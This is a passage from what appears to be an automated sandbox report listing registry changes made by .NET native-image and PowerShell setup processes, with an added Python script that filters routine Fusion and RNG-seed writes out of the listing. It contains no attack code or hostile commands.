[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 EC BD 2C AA C4 D0 53 C2 CA 68 67 9F DB 13 24"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "FA BB 8F 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:1112 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "9A E1 B5 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D E4 74 25 E5 4F E5 5E DE 11 0E 6D A3 D0 D8 B0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2940 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 72 7F 69 84 68 18 0C B3 BC D8 45 2A C6 D4 D4"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "40 33 78 80 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
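Nearly every write listed for the mscorsvw.exe instances above lands under NGenService, Fusion\NativeImagesIndex or Fusion\GACChangeNotification, which the .NET 2.0 Native Image Service rewrites on each compile pass, or is the CryptoAPI RNG Seed that any process reseeds when it draws randomness. Those are side effects of the processes running, not persistence or configuration changes. The entries worth reading are the few that fall outside those namespaces, such as the Shell Folders writes and the Fusion\References value "PowerShell Setup", which records the installer that placed the PowerShell assemblies in the GAC. The script below is an added example, not part of the report or of the Lavasoft tooling: it parses the "[KEY]" / "Name" = "Value" listing format used on this page and separates that background noise from the remaining writes. The noise prefixes are an assumption about what the native-image service and CryptoAPI touch, and the sample text is constructed from lines on this page.

```python
"""Triage the registry-change listings in a sandbox report.

Added example, not part of the original report or of Lavasoft's tooling.
It parses the '[KEY]' / "Name" = "Value" block format used in the report
and sorts each write into background noise from the .NET Native Image
Service (mscorsvw.exe / ngen.exe) and CryptoAPI versus entries worth a
second look.  NOISE_PREFIXES and NOISE_VALUES are an assumption based on
what those components are documented to rewrite; extend them as needed.
"""
import re

# Namespaces the .NET 2.0 native-image service rewrites on every compile
# pass; they carry no attacker-controlled content.  (Assumed noise set.)
NOISE_PREFIXES = (
    r"HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService",
    r"HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex",
    r"HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification",
)
# CryptoAPI reseeds this value whenever a process draws randomness; it is
# a side effect of the process running, not a persistence artefact.
NOISE_VALUES = {(r"HKLM\SOFTWARE\Microsoft\Cryptography\RNG", "Seed")}

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"\s*=\s*"(?P<value>.*)"$')
PROCESS_RE = re.compile(r"^The process (?P<proc>\S+) makes changes")

# Constructed sample: a handful of lines copied from the report above.
SAMPLE = r"""
The process mscorsvw.exe:2700 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 60 EE A6 A2 00 34 7A 18 40 19 87 49 D0 4C AE"

The process PSCustomSetupUtil.exe:3868 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
"""


def parse_report(text):
    """Yield (process, key, name, value) for every value line in the text.

    The current process and key are carried forward until the next
    'The process ...' or '[KEY]' line replaces them.
    """
    process, key = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PROCESS_RE.match(line)
        if m:
            process = m.group("proc")
            continue
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            yield process, key, m.group("name"), m.group("value")


def is_noise(key, name):
    """True when the write is attributable to ngen/Fusion bookkeeping or RNG reseeding."""
    if (key, name) in NOISE_VALUES:
        return True
    return any(key.startswith(prefix) for prefix in NOISE_PREFIXES)


def triage(text):
    """Return (noise_count, [(process, key, name, value), ...]) for the non-noise writes."""
    noise = 0
    interesting = []
    for proc, key, name, value in parse_report(text):
        if is_noise(key, name):
            noise += 1
        else:
            interesting.append((proc, key, name, value))
    return noise, interesting


if __name__ == "__main__":
    count, hits = triage(SAMPLE)
    print(f"{count} background writes suppressed; {len(hits)} worth review:")
    for proc, key, name, value in hits:
        print(f"  {proc}: [{key}] {name!r} = {value!r}")
```

Run it over the full text of the "Dynamic Analysis" section and the output shrinks to the handful of Shell Folders and Fusion\References entries, which is the part of this listing an analyst actually has to read.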

The process PSCustomSetupUtil.exe:3868 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 6B B4 6F E8 C0 8E 84 CF 04 7A 38 7A 02 F0 79"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "40 33 78 80 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2844 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD E6 3C 61 55 F2 83 35 66 F4 49 E0 D6 4A 7D E9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "00 34 67 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:2924 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 2F 5E 1B 33 55 F4 59 9A 3D A2 C1 E3 53 CC"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "94 69 DE 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:3140 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 5A C9 EE 94 85 6A 21 2E A3 1F 04 2E BB 49 50"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "08 10 C8 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:3004 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CD 6D EB CE AE 9A 36 18 C9 D7 C5 62 49 17 E7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "2E 17 2D 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:3060 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 8D 51 07 D9 B3 F9 9E 3C 55 A1 42 19 96 1C CF"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "6E 62 79 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3308 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 00 C5 13 FF 57 75 B9 D5 56 1B 99 B2 ED E5 B0"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C 7E 78 7D 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3736 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 26 7E BD 4E EF 33 92 46 73 1D CD A1 02 A1 EA"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 86 2A 7F 93 12 02 56 6E 10 EC 0E 5F 6F B0 AB"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
